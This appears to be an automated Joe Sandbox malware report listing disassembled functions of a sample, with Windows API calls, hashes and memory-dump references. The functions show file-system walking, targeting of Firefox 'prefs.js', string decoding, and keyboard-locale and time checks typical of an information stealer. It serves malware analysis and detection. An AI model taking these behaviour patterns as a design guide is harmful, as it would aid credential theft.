                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: 4@$\*.*
                                  • API String ID: 2325840235-1993203227
                                  • Opcode ID: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                  • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                  • Opcode Fuzzy Hash: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                  • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                  Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                  • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                  • Opcode Fuzzy Hash: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                  • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                  Function 004016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                  • FindClose.KERNEL32(000000FF), ref: 00401E32
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                  • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                  • Opcode Fuzzy Hash: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                  • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                  Function 022EEF87 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 022EEFA5
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022EEFBC
                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 022EF012
                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 022EF028
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EF515
                                  • FindClose.KERNEL32(000000FF), ref: 022EF52A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID:
                                  • API String ID: 180737720-0
                                  • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                  • Instruction ID: 5fc49010422755d1777c2abeaf54777e42781dc8abb2784f6c0d2cf12eb96ad2
                                  • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                  • Instruction Fuzzy Hash: 61E1F0729213189ADB98FBA4DD51EEEB33AAF64300F4041E9B20E62155EF345F89CF50
                                  Function 022EDCE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022EDD52
                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 022EDD9A
                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 022EDDB0
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EE033
                                  • FindClose.KERNEL32(000000FF), ref: 022EE045
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                  • Instruction ID: 7851fd3f881908eb277134c6bd20698cd3f2e29a1a9bf94dece3e323b374f225
                                  • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                  • Instruction Fuzzy Hash: DD9152729203049BCF14FBF4DD559EDB37EAB99700F408668A94E96148EF389B1C8F91
                                  Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                  • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                  • Opcode Fuzzy Hash: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                  • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                  Function 022EF917 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022EF985
                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 022EF9D6
                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 022EF9EC
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EFD18
                                  • FindClose.KERNEL32(000000FF), ref: 022EFD2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                  • Instruction ID: 6c45e323eb97f3f5fe0a980a2654476231ca5aa70f4130f23701df1e8cec4963
                                  • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                  • Instruction Fuzzy Hash: FCB150719203189BCF64FFA4DDA5EEEB37AAF54300F4081A9A50E56258EF345B48CF91
                                  Function 0040E430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*$@
                                  • API String ID: 433455689-2355794846
                                  • Opcode ID: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                  • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                  • Opcode Fuzzy Hash: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                  • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                  Function 022E1937 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022E1B8A
                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 022E1BDA
                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 022E1BF0
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022E1FA7
                                  • DeleteFileA.KERNEL32(00000000), ref: 022E2031
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022E2087
                                  • FindClose.KERNEL32(000000FF), ref: 022E2099
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 1415058207-0
                                  • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                  • Instruction ID: 10ae1d3b714fbd67eee01f00ba40f8fca7763c1ebdd70c10f4578533f8b38cf4
                                  • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                  • Instruction Fuzzy Hash: 7212D0719203189BCB59FBA4CDA5EEDB37AAF64300F4041B9A60E62194EF745F89CF50
                                  Function 022EE077 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022EE0C5
                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 022EE115
                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 022EE12B
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EE647
                                  • FindClose.KERNEL32(000000FF), ref: 022EE659
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2325840235-0
                                  • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                  • Instruction ID: 1abcb59c951704e9f86fcd69d1cf7d4e12a5de39169595e985caae893467662b
                                  • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                  • Instruction Fuzzy Hash: F1F190715243189ACB59EBA4DDA5EEEF33ABF24700F8041E9A14E62154EF345F89CF50
                                  Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                  • LocalFree.KERNEL32(00000000), ref: 00417D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                  • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                  • Opcode Fuzzy Hash: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                  • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                  Function 022ECA87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 022ECABA
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ECAD8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ECAE3
                                  • memcpy.MSVCRT(?,?,?), ref: 022ECB79
                                  • lstrcat.KERNEL32(?,00420B46), ref: 022ECBAA
                                  • lstrcat.KERNEL32(?,00420B47), ref: 022ECBBE
                                  • lstrcat.KERNEL32(?,00420B4E), ref: 022ECBDF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                  • String ID:
                                  • API String ID: 1498829745-0
                                  • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                  • Instruction ID: 2c08af503c13e0fbdf5f87d3fc45c0b002e540d72ab0b34ad572449b51ee6aef
                                  • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                  • Instruction Fuzzy Hash: 1141807895421AEFDB10DFD0DC88BEEBBB8BB44304F1045A9E60AA6284D7745B84CF91
                                  Function 0040C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0040C853
                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008836E0), ref: 0040C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                  • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                  • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                  • String ID:
                                  • API String ID: 1498829745-0
                                  • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                  • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                  • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                  • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                  Function 00416920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00883680,?,0042110C,?,00000000,?), ref: 0041696C
                                  • sscanf.NTDLL ref: 00416999
                                  • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00883680,?,0042110C), ref: 004169B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00883680,?,0042110C), ref: 004169C0
                                  • ExitProcess.KERNEL32 ref: 004169DA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID: B
                                  • API String ID: 2533653975-2248957098
                                  • Opcode ID: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                  • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                  • Opcode Fuzzy Hash: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                  • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                  Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
